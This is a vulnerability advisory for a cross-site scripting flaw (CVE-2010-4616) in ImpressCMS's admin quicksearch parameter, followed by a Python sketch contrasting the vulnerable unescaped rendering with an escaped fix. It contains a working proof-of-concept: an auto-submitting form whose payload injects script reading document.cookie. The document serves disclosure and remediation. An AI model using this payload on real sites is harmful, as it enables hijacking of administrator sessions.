High-Tech Bridge SA Security Research Lab has discovered a vulnerability in ImpressCMS which could be exploited to perform cross-site scripting attacks.
- Cross-site scripting (XSS) vulnerability in ImpressCMS: CVE-2010-4616
The vulnerability exists due to an input sanitization error in the "quicksearch_ContentContent" parameter in modules/content/admin/content.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim has access to the administrative interface.
Exploitation example:
<form action="http://host/modules/content/admin/content.php" method="post" name="main">
<input type="hidden" name="quicksearch_ContentContent" value='search"><script>alert(document.cookie)</script>'>
<input type="hidden" name="button_quicksearch_ContentContent" value="Search">
<input type="hidden" name="filtersel" value="default">
<input type="hidden" name="limitsel" value="15">
</form>
<script>
document.main.submit();
</script>
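The PoC value works because the parameter is reflected into an HTML attribute unencoded: the leading double quote closes the attribute, and the rest of the value is then parsed as markup. The following is an added illustration, not ImpressCMS code: it reconstructs the defect in a small Python renderer (a hypothetical stand-in for the PHP script) next to the fixed version, which applies attribute-context encoding (the PHP equivalent is htmlspecialchars($value, ENT_QUOTES, 'UTF-8')), and counts the tags a browser would see in each output.

```python
import html
import re

# Constructed payload, the same value the advisory's PoC submits in
# the quicksearch_ContentContent parameter.
PAYLOAD = 'search"><script>alert(document.cookie)</script>'


def render_quicksearch_vulnerable(value):
    """Hypothetical reconstruction of the defect: the search term is
    reflected straight into the value attribute with no encoding, so a
    double quote in the input terminates the attribute."""
    return ('<input type="text" name="quicksearch_ContentContent" '
            'value="' + value + '">')


def render_quicksearch_fixed(value):
    """Fixed version: encode for the HTML attribute context. quote=True
    escapes both quote characters as well as &, < and >, so the input can
    never leave the attribute it was placed in."""
    return ('<input type="text" name="quicksearch_ContentContent" '
            'value="' + html.escape(value, quote=True) + '">')


_TAG_RE = re.compile(r'<[a-zA-Z/][^>]*>')


def tag_names(markup):
    """Names of the HTML tags a browser would parse out of the markup.
    Used here to show whether the payload became a real <script> element."""
    return [re.match(r'</?([a-zA-Z]+)', t).group(1).lower()
            for t in _TAG_RE.findall(markup)]


if __name__ == "__main__":
    # Vulnerable output: input, script, script -- the payload executes.
    print(tag_names(render_quicksearch_vulnerable(PAYLOAD)))
    # Fixed output: only the input element; the payload is inert text.
    print(tag_names(render_quicksearch_fixed(PAYLOAD)))
```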